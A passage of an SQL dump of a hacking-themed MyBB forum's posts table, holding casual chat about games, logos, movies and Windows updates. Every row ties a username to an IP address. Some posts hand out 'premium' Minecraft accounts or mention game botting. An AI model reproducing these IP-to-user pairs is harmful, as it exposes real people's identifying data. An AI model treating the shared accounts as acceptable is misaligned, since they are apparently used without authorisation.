'0', '0', '1', 'ce0c893d10b6e896babd132cb40d2ea5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4672', '829', '4328', '74', 'RE: Adventure Quest Worlds', '0', '82', 'iTzIpod', '1350254316', 'I swear there was a badge for linking a DF account to the AQW account..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '6782cd937b4790f3c5537f3263ed0e39', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4673', '829', '4328', '74', 'RE: Adventure Quest Worlds', '0', '254', 'Greed', '1350254405', 'nope lol, I checked all the badges and what not lol, just gotta wait til the event is done.', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', '9d36b78e486b835ea1d62b74f47eda9a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4674', '829', '4328', '74', 'RE: Adventure Quest Worlds', '0', '82', 'iTzIpod', '1350254470', 'I found it. It was in the Book of Lore. A.E. Section. But I can\'t go to the place because it\'s a black screen due to the event... Gotta wait till event ends. FML', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '89354ef446dc11560b7e49bfe50903f2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4675', '829', '4328', '74', 'RE: Adventure Quest Worlds', '0', '254', 'Greed', '1350254559', 'so what lvl are you and how much gold you got? lol', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', '65fe74e6ee598a9501882189c8271361', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4676', '829', '4328', '74', 'RE: Adventure Quest Worlds', '0', '82', 'iTzIpod', '1350254625', '[img]http://i.imgur.com/kyWbG.png[/img]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0ee073b5d286afb426a7637c453d4c7d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4677', '690', '3516', '69', 'RE: What are your fav or which coding languages do you know?', '0', '262', 'RAND0M1ZER', '1350259163', 'I know C/C++, VisualBasic, PHP, HTML, CSS, and Java.', '108.162.138.186', '1822591674', '0', '0', '0', '0', '1', '7bb8f9b9257d9a5fb481e249071e910f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4678', '850', '4478', '63', 'RE: anyone interested in making me a logo', '0', '257', 'XxTREYZxX', '1350259524', 'yeah i want to say l33T on it and you can choose the colurs', '203.104.11.4', '-882373884', '1', '0', '0', '0', '1', '694c66034bfaf7331a9e9117a72c56d2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4679', '704', '3616', '66', 'RE: Minecraft Accounts', '0', '257', 'XxTREYZxX', '1350259799', 'hey yeah i\'m interested in one if you don\'t mind. pm\'ing you now', '203.104.11.8', '-882373880', '1', '0', '0', '0', '1', '669f629aa54314812ea95f389a74c85b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4680', '850', '4478', '63', 'RE: anyone interested in making me a logo', '0', '82', 'iTzIpod', '1350259862', 'Forum Colors good? Green + Black?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c1909d5de00e4724a1756ba13f39d45f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4681', '850', '4478', '63', 'RE: anyone interested in making me a logo', '0', '257', 'XxTREYZxX', '1350260056', 'yeah thats fine its up to you. you are the graphics beast (LOL). and thanks alot for actually helping me out.', '203.104.11.5', '-882373883', '1', '0', '0', '0', '1', '8bf53c910606e10f809ae7b1632b25f7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4682', '855', '4547', '74', 'RE: need a minecraft account (premium)', '0', '257', 'XxTREYZxX', '1350260241', 'i dont have skype sorry i will create one though when i go to my dads (sorry)', '203.104.11.9', '-882373879', '1', '0', '0', '0', '1', '9ddaacc252d2ade71489e60989f1c025', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4683', '855', '4547', '74', 'RE: need a minecraft account (premium)', '0', '82', 'iTzIpod', '1350261431', 'It\'s ok. I sent you a working account.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '84c3297c83229b78fcb35fc08f996acd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4684', '850', '4478', '63', 'RE: anyone interested in making me a logo', '0', '82', 'iTzIpod', '1350261458', 'No I\'m not.. Reloadzor is. :) Nice try though :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'aa06300557514b687b3281a5bdd99916', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4685', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '222', 'Exposé', '1350261538', 'Nice...hopefully we can reach all of these milestones quickly :d', '74.76.76.132', '1246514308', '1', '0', '222', '1350261687', '1', '89726f719cb79a0a3f94da9880a8a1d0', '0', '1350261687'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4686', '515', '2552', '3', 'RE: [Announcement] MyBBTopSites/ForumTopSites Vote For L33tHacking', '0', '222', 'Exposé', '1350261738', 'Nice...i\'m pretty sure I voted :D', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'fe8f3347166ed4936763a8ab64177d91', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4687', '865', '0', '73', 'that great app series 1', '0', '257', 'XxTREYZxX', '1350261994', 'hello L33T and welcome to that great app series 1, game 1 and the app today isssss subway surfers, subway surfers is this fast paced running like temple run but you actually getting chased by a security guard weaving, dodging, jumping, jet packing this game is fun and competitive, upgrades are available to buy at the shop for example head starts, and super boots. head starts are a item which boosters you a certain amount of score and super boots allow you to jump really high. you can also buy other characters to make your game just that little bit funner. hope you enjoy this game. be back tomorrow with another great game. post yes and why if i should keep continuing this series and post no and why if you do not want this series to keep going, thanks and hope you enjoy.', '203.104.11.43', '-882373845', '1', '0', '257', '1350279585', '1', '44f0056e8ef436ef14d44e5ca6f4541f', '0', '1350279585'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4688', '850', '4478', '63', 'RE: anyone interested in making me a logo', '0', '257', 'XxTREYZxX', '1350262197', 'are you still going to make that logo for me', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '8b0dfad8062463b3319ba2c0465e4f0b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4689', '855', '4547', '74', 'RE: need a minecraft account (premium)', '0', '257', 'XxTREYZxX', '1350262295', 'thanks am i allowed change the password and stuff or is it local.', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', 'd9e6a8bae30ff9b38c75fc3bd43cfdb4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4690', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '257', 'XxTREYZxX', '1350262421', 'damm im not on that list, ill keep on active and will hopefully get on that list', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', 'd2b2cf915e7adc73db895d70af60ccd6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4691', '855', '4547', '74', 'RE: need a minecraft account (premium)', '0', '82', 'iTzIpod', '1350262928', 'You\'re allowed to change it and stuff. :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '8938a4ee9d38d27592c0d61014df43e9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4692', '866', '0', '7', 'Anyone trade paypal for a DC?', '0', '222', 'Exposé', '1350262958', 'I am trying to purchase a domain costing 65 euros (or 89$) with my DC and it is not accepting it. So I need someone with 89$ or more to trade the paypal for my DC. I can have you tv me and I will show proof. If anyone can help me that would be great!', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '50852e440402e1d437f12a2a695a19a3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4693', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '82', 'iTzIpod', '1350262964', 'What list are you guys talking about? :o', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '97f1e9f62da28d48772afe434dc452de', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4694', '515', '2552', '3', 'RE: [Announcement] MyBBTopSites/ForumTopSites Vote For L33tHacking', '0', '82', 'iTzIpod', '1350262988', 'Voted again. :) Keep it up. :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ce1530d611cc1068e30330a3501997ba', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4695', '850', '4478', '63', 'RE: anyone interested in making me a logo', '0', '82', 'iTzIpod', '1350263018', 'I will. I\'m just busy doing my homework right now. I have school tomorrow too. Just wait please.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '43f9e15fd6ba1bcc63900710c7d5b3fa', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4696', '850', '4478', '63', 'RE: anyone interested in making me a logo', '0', '257', 'XxTREYZxX', '1350263314', 'yeah ok i just got a little bit scared hahah Lol thanks so much', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '5822227d5e936f02243bc0508b3a6e8a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4697', '850', '4478', '63', 'RE: anyone interested in making me a logo', '0', '82', 'iTzIpod', '1350263403', 'It\' ok. No problem. I don\'t scam people. Don\'t worry. I\'m trusted too. :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b257d3f93668cfca95ebc9dd2d2d5d51', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4698', '850', '4478', '63', 'RE: anyone interested in making me a logo', '0', '257', 'XxTREYZxX', '1350263558', 'ok thanks so much. really appreciated', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '0bd805218bd2a8b0a48d0ce8bd2f60bb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4699', '850', '4478', '63', 'RE: anyone interested in making me a logo', '0', '82', 'iTzIpod', '1350263689', 'You\'re welcome :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'dfe0fb50335c14b4147f72209aa429c7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4700', '855', '4547', '74', 'RE: need a minecraft account (premium)', '0', '257', 'XxTREYZxX', '1350263898', 'sweet, why are you the best member ever?', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '8dae5316aadf5d6768f7492896923e94', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4701', '855', '4547', '74', 'RE: need a minecraft account (premium)', '0', '82', 'iTzIpod', '1350264078', 'You\'re welcome :) It\'s because I\'m the best member.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '48f9900838d3194ec2e288d177bab7ab', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4702', '855', '4547', '74', 'RE: need a minecraft account (premium)', '0', '257', 'XxTREYZxX', '1350264154', 'haha lol keep up the good work and you could be MOTM if they have going still', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '72385891a7573176655cd4306c3f8dfc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4703', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '257', 'XxTREYZxX', '1350264271', 'the ten active users on l33T', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '1132dd14ac1a94118117574a5675d679', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4704', '690', '3516', '69', 'RE: What are your fav or which coding languages do you know?', '0', '2', 'Apathy', '1350264273', 'I know your age. :3 but I know HTML, learning python and vb.', '173.206.129.235', '-1378975253', '0', '0', '0', '0', '1', 'efceb0ee4ae13d80a4fdc8ed15e6658e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4705', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '2', 'Apathy', '1350264344', 'Nice to see those achievements. :) It should only get better.', '173.206.129.235', '-1378975253', '0', '0', '0', '0', '1', 'de9df27ab7e3e768fb1b7bd7073fa4d7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4706', '829', '4328', '74', 'RE: Adventure Quest Worlds', '0', '2', 'Apathy', '1350264504', 'What are you botting with? I might bot for a little. :3', '173.206.129.235', '-1378975253', '0', '0', '0', '0', '1', '527b79197b901da16c5e75afe9db307c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4707', '850', '4478', '63', 'RE: anyone interested in making me a logo', '0', '2', 'Apathy', '1350264574', 'I might give it a go. :)', '173.206.129.235', '-1378975253', '0', '0', '0', '0', '1', '0da865c0871ea197bf357225c24fd403', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4708', '850', '4478', '63', 'RE: anyone interested in making me a logo', '0', '257', 'XxTREYZxX', '1350264760', 'yeah alright even though i\'v already got some one doing, give it ago and ill see which one is better', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', 'af96b9d241b0d042dcca36ed0b55d497', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4709', '867', '0', '71', 'Fifa 13', '0', '257', 'XxTREYZxX', '1350266621', 'hey l33T users, just wondering who\'s getting fifa 13', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', '1634244a871adf754bcb4b5e47c05ad6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4710', '868', '0', '71', 'whats the best COD', '0', '257', 'XxTREYZxX', '1350266862', 'hey l33T users whats up, just wondering whats the best cod!', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', 'e72c45d5ab1769076e6cb93a7941be6c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4711', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '205', 'mothered', '1350267563', 'This Is certainly a great Idea Indeed. Nice that you\'ve stickied It too.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'f729810e23357d8c0d1580347009fe5b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4712', '869', '0', '74', 'who loves counter strike', '0', '257', 'XxTREYZxX', '1350267665', 'hey l33T users and today i just wanna say who loves counter strike because i know i do i thinks its great.', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', '08af673eed2fb4982fb152984b40eb53', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4713', '870', '0', '74', 'Great minecraft pvp <JOIN> -150 slots', '0', '257', 'XxTREYZxX', '1350267872', 'hey l33T users and today im going to be telling you a great pvp server which is a archer games, you can choose your , earn money by winning and voting, buying stuff the ip:ag1.playeoe.com you can change the number to 1 -9 for a new map, host and server, hope you enjoy. tell me if you like it thanks :angel:', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', '157d920b2f49bfc9d6e27f260294ca13', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4714', '835', '4381', '24', 'RE: Just purchased another Lappy', '0', '205', 'mothered', '1350267965', 'Thanks R?????zo?, appreciate the comment. It\'s used as a test lappy, and must say, that It does perform quite well. The first thing I did, was get rid of all the OEM crap that was pre-Installed. I hit a clean Installation of Windows (deleted all existing partitions, and Installed on the Unallocated disk space), Installed the latest drivers, and It runs like a dream.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '10430318d34eb8031735ef6f4ed87d10', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4715', '871', '0', '65', 'What\'s Your Top 3 Movies?', '0', '205', 'mothered', '1350268067', 'Greetz to all, So what are the best 3 movies you\'ve seen? Mine (not respectively): 1. Taken (Liam Neeson) 2. Ransom (Mel Gibson) 3. Killer Elite (Jason Statham) I\'m not really Into comedies. To watch a comedy, It\'ll have to be a 9/10 rating.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '58f0b2f2ea410c8f1ed906d4277127e2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4716', '835', '4381', '24', 'RE: Just purchased another Lappy', '0', '257', 'XxTREYZxX', '1350268138', 'nice laptop, it also looks nice:)', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', '92347cf7b08132d1261bead6cd276eb9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4717', '872', '0', '24', 'Windows Updates, who uses It?', '0', '205', 'mothered', '1350268175', 'Hello to all, Well, I\'ve come across a lot of users who disagree with what I\'m about to document. In my views, I believe Windows Updates Is just a load of trash. There\'s been quite a few times whereby upon performing an update(s), It corrupted my system and/or some loss of functionality. All I\'m Interested In Is booting up my lappy and getting on with my work, and not wait for \"Installing updates, please wait.......Don\'t turn off your computer.........10% done........15%done.....\" then wait again for the configuration process. I haven\'t performed an update on all 7 lappies for 6 years, and all Is running fine. Any security, patches, fixes, etc, are Installed by myself, so I really don\'t need some useless crap that slows me down. It\'ll be Interesting to read your thoughts...', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '6b0580e8be85b0b44416fab5fc772701', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4718', '873', '0', '7', 'What do you think of Facebook?', '0', '205', 'mothered', '1350268348', 'Greetings everyone. As the thread\'s title reads, what do you guys think of Facebook? There\'s no right or wrongs here, and It\'s totally Impartial and unbiased, so be honest with your answer. I reckon It\'s the biggest load of trash ever to hit the net. I can\'t fathom why a given person would upload their photos, and share their personal details with the rest of the world to see. Just ridiculous. Your thoughts?', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '3a23e7ae4f2b9d8a43b74cf87e294d3b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4719', '873', '4718', '7', 'RE: What do you think of Facebook?', '0', '257', 'XxTREYZxX', '1350268562', 'my thought is its great (my opinion) because you can see whats others are doing you can laugh at people\'s selfies but on the other hand who would wanna post their details (what noobs) i did some fake info', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', '41044b2e4b2f6bcce0fdd2b1ecd46142', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4720', '872', '4717', '24', 'RE: Windows Updates, who uses It?', '0', '257', 'XxTREYZxX', '1350268661', 'yeah i do the updates just because i dont really care, i will just buy another one haha lol', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', '945f90d7837336d3e9fbac723cf4a36b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4721', '619', '3008', '34', 'RE: [Photoshop CS5] How to make a logo', '0', '205', 'mothered', '1350268747', 'I\'m terrible at graphics, and this guide will certainly be of great benefit. Thanking you :)', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '569012f821dacf9add8290adbeb2f312', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, 